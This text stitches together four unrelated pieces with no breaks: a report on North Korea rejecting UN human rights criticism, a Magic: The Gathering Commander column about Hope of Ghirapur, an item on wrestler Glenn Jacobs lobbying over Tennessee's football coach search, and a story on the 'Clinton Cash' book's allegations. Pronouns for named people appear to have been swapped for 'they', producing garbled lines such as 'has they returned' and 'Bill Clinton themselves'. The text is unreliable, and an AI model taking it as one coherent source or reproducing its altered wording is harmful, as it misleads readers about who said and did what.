“Hostile powers are planning to have a go at criticizing [North Korea] during the 30th regular session of the Human Rights Council,” a foreign ministry spokesperson said on Korean Central News Agency, according to reports from United Press International. “The evidence is nothing more than lies from North Korean defectors, whose testimonies cannot be corroborated,” they added.
The UN plans to discuss North Korea's human rights record on September 21, but North Korea's spokesperson said the measure is “a political manoeuvre aimed at overthrowing our regime.”
In June, the UN opened an office in Seoul, South Korea, to monitor North Korea's human rights record. In response, Pyongyang threatened “toughest counteractions” to this “grave provocation.”
The United Nations report on North Korean human rights abuses, published last year, included details of starvation, killings, and huge prison camps holding up to 120,000 people.
Based on the report, the UN General Assembly called on the Security Council to refer North Korea to the International Criminal Court.
Normally I like to dive right into the meat of an article, but since this is my first time appearing on Hipsters of the Coast, I'll take a moment to introduce myself. I've been a magic player for the better part of eight years now, mostly playing Commander and Legacy with a lot of interest in the story and lore of Magic. For the past year and a half I've been co-authoring the Dear Azami column at StarCityGames, alongside Sean McKeown and Hipsters' own Jess Striba.
Now I'm bringing Dear Azami to Hipsters and I'll be taking submissions from you guys and working on decks that you send in. But I'll also be writing several pieces that delve into Commander as a format or story analysis. Since this is my first week here and I don't have any decklists to work with yet, let's talk about Hope of Ghirapur.
That might seem like a completely random thing to say, but hear me out.
Whenever a new set comes out, I imagine that each of you has a certain way to sift through all of the cards. Some of you look at the commons with an eye for Limited, some try to anticipate which cards will impact Standard, some look for cards in specific categories to see if any will fit into their existing decks. My own routine is fairly simple: scan the red cards for any spells that might be even fringe playable in Legacy burn, then pull up all the new Legendary creatures and try to figure out what they could do at the helm of a Commander deck.
Part of that is my tendency to brew decks, as I've always been intrigued by the puzzles that you can build when you're guaranteed to have a specific piece. But that changed once I started writing about Magic last year. Suddenly I didn't have the luxury of skipping over the legends that didn't inspire me, since a big part of my role at StarCityGames was hyping the news cards to get people excited. There was pressure to cover every new legend, so I needed to have ideas about every potential commander.
To be fair I was quite good at finding an angle on even the most oddball legends—Anya, Merciless Angel anyone?—but my habit of mentally evaluating new legends didn't die when I stopped writing for StarCity. Enter Hope of Ghirapur.
Initially I laughed off this little thopter because it's so obviously terrible in Commander. A 1/1 flyer for one might've been notable fifteen years ago but nowadays, especially in a 40-life multiplayer format, those stats won't impress anyone. As for the sacrifice ability, keeping an opponent from casting noncreature spells for a turn is a speed bump but not much more than that. On top of all that, Hope of Ghirapur is colorless so you only have access to the most restricted set of tools when trying to use with it. Add in the fact that Karn and the Eldrazi already enable colorless decks and Hope of Ghirapur isn't really that unique.
But every time I looked through the set this little 1/1 jumped out at me. Why? I didn't know what to do with it. Every time I saw the card I would try to imagine a deck that wanted it and fail. For a while I toyed around with a janky idea that used Salvaging Station, Mirrorworks, Mirror Gallery, and a whole host of other cards to make multiple Hope of Ghirapurs every turn to prevent your opponents from ever casting noncreature spells, but that idea stalled out when I remembered that Salvaging Station can only reanimate noncreature artifacts. Even if it had worked, it would've been more of an ‘achievement unlocked' type of deck that would've existed to do a single cool thing once and then get taken apart. The easy answer would've been to say the card was never intended for Commander and leave it at that. I kept thinking about it in the back of my mind, to no avail.
Fast forward to last week, when my roommates and I sat down to play a few games. This was the first time we'd had time to play in a few months, so the conversation eventually drifted to the new commanders that had come out in the intervening time: Partners, four-color commanders, the utter silliness that is Rashmi, Eternities Crafter. And then, when I'd half tuned-out and gone to grab food, one of my friends said: “I really want to build a bad deck with Hope of Ghirapur.”
Obviously I was curious, and asked them if they had a plan in mind. Theirs answer? A voltron deck packed to the gills with as much equipment as possible. In their own words; “It's a one drop with evasion. All you need to do is buff it.” I was stunned, because I'd missed something that obvious. I'd been so quick to dismiss Hope of Ghirapur's combat potential that I'd blinded myself to what might be the only deck that could make the little artifact work.
I'm not saying that Hope of Ghirapur is going to be the next Uril the Mistalker, far from it. But with a little effort you could make a solid aggressive deck for a fraction of what an average Commander deck would cost.
The reason I bring all of this up is that it revealed my biggest bias in Magic. This might be ironic coming from a burn player, but I'm such a Johnny that I have a hard time looking beyond the noncombat abilities on a card. For better or worse, I'll always be the person trying to build elaborate engines and maximize value, more focused on designing something that I enjoy than building a deck that's respectable in combat.
If Hope of Ghirapur had just been a 1/1 flyer for one, I probably would've seen the potential for a voltron deck instantly. But I let the (mostly irrelevant) sacrifice ability blind me because I wanted to do something with it.
As much as that impulse has led me to great success with a huge number of decks, it was a weakness here. This was the first time I'd had this bias revealed quite as blatantly as it was here, and especially in the light of me returning to writing Dear Azami it made me realize that I would have to reexamine how I go about crafting a decklist on a fundamental level.
After all, not everyone is me, and there are as many ways to enjoy the game as there are players.
I hope you enjoyed this peek at my musings. I'll be back in two weeks with a more traditional deck editing article, which means this is a great chance for you guys. If any of you reading this have a deck that needs help and want to have your work featured on the first Dear Azami here at Hipsters, then send your decklists to DearAzami@gmail.com, along with a description of what problems the deck is having or what direction you want to take the list in.
Levi Byrne says hello again for the first time.
Tennessee has already gone through this year's installment of the #GRUMORS, fans revolted against athletic director John Currie's decision to hire Greg Schiano, and Currie has a handful of coaches including Duke's David Cutcliffe, Oklahoma State's Mike Gundy and Purdue's Jeff Brohm all pass on Rocky Top.
WWE wrestler Kane -- real name is Glenn Jacobs, who just so happens to be a mayoral candidate for Knox County -- decided to weigh in with their own brilliant suggestion for the next coach of the Vols: former LSU coach Les Miles.
Good friend who works with @CoachLesMiles just told me that Les is extremely interested in UT position. He'd look great in Orange. #CallLes — Glenn Jacobs (@GlennJacobsTN) November 30, 2017
Miles has been out of coaching since late September 2016, when they were fired from LSU after a 2-2 start. During their time in Baton Rouge, they were 114-34, 62-28 in the SEC, won two SEC championships (2007, 2011) and won the national championship following the 2007 season.
But after years of a stale offense that didn't seem to evolve at all into the new era of more wide open football, LSU athletic director Joe Alleva had enough in the middle of last season after toying with the idea of letting go of Miles following the 2015 regular season.
Kane, meanwhile, has a lot on their hands these days. Not only has they returned to WWE at age 50 while in the middle of a gubernatorial election, they have been active regarding this coaching search. They previously supported the fans' revolt and told Currie that Schiano was not an acceptable candidat.e
Too many well-founded concerns about Schiano from our community. Hiring would be very unpopular and hurt UT. Please rethink, @John_Currie
GBO! — Glenn Jacobs (@GlennJacobsTN) November 26, 2017
Hillary Rodham Clinton used their clout as secretary of state to do favors for foreign donors who gave millions to their family foundation — and who paid millions more to their husband, Bill, in speaking fees, a new book charges.
Records show that of the $105 million the former president raked in from speeches over 12 years, about half came during their wife's four-year tenure at the State Department.
The claims in “Clinton Cash: The Untold Story of How and Why Foreign Governments and Businesses Helped Make Bill and Hillary Rich” come just a week after they launched their presidential campaign.
They raise questions about shady foreign money flowing into the Clinton Foundation — and what actions Hillary took in their official capacity in exchange for the cash.
“During Hillary's years of public service, the Clintons have conducted or facilitated hundreds of large transactions,” writes author Peter Schweizer, according to The New York Times, which first reported the story.
“Some of these transactions have put millions in their own pockets.”
Schweizer — a former speech-writing consultant for President George W. Bush — said they found a clear “pattern of financial transactions involving the Clintons that occurred contemporaneous with favorable US policy decisions benefiting those providing the funds.”
One example of an alleged quid pro quo cited by the Times and other sources involved the State Department's backing of a free-trade agreement with Colombia that benefited a company founded by a big donor to the Clinton Foundation.
Hillary opposed the trade deal when running for president in 2008 because of the South American country's poor record on workers' rights.
But then the company, Canadian-based Pacific Rubiales, and its founder, Clinton Foundation board member Frank Giustra, donated “millions” to the foundation, The International Business Times reported.
In 2010, the State Department under Hillary lauded Colombia's human rights record, allowing Giustra's company to reap huge profits.
The book also examines lucrative development contracts awarded to foundation donors following the devastating Haitian earthquake in 2010. And it reports that Hillary's brother, Tony Rodham, sat on the board of a small North Carolina mining company that in 2012 got one of only two coveted “gold exploitation permits” from the government of Haiti — the first issued in more than 50 years, according to the website Breitbart.
Bill Clinton themselves was paid $1 million by a Canadian bank and major shareholder in the Keystone XL oil pipeline as the State Department was considering the project, Schweizer charges.
Records show that Bill's earnings from appearance fees — both foreign and domestic — spiked at $17 million in 2012, Hillary's last year at State.
During Hillary's four-year stint as secretary of state, the ex-president earned about $48 million of a $105 million speaking haul amassed between 2001 and 2013.
More than half of the $48 million was paid by companies in China, Japan, Canada, Russia, Saudi Arabia, the United Arab Emirates and the Cayman Islands, among others.
The author writes that “of the 13 Clinton speeches that fetched $500,000 or more, only two occurred during the years their wife was not secretary of state.”
Bill Clinton is believed to be the richest living ex-president and one of the 10 wealthiest ever.
Most estimates put the power couple's combined net worth at $100 million to $200 million.
Bill Clinton is believed to be the richest living ex-president and one of the 10 wealthiest ever.
Some of the fees were paid at the Clintons' request to their foundation — netting domestic donors a fat tax break. But most went directly to Bill, and the fees make up the family's main source of income, The Washington Post reported.
Following Hillary's decision to run for president, the foundation itself announced last week it would accept donations only from Australia, the United Kingdom, the Netherlands, Canada, Germany and Norway.
The 186-page book will go on sale May 5, but Hillary wasted no time dismissing it.
“We're back into the political season and, therefore, we will be subjected to all kinds of distraction and attacks and I'm ready for that. I know that that comes, unfortunately, with the territory,” they said Monday in Keene, NH.
“It is, I think, worth noting that the Republicans seem to only be talking about me. I don't know what they'd talk about if I wasn't in the race, but I am in the race and hopefully we'll get on to the issues,” they added.
Allison Moore, spokesperson for the Republican National Committee, responded by bringing up Hillary's use of a private email account for official business and their deletion of thousands of emails.
Additional reporting by Geoff Earle and Marisa Schultz
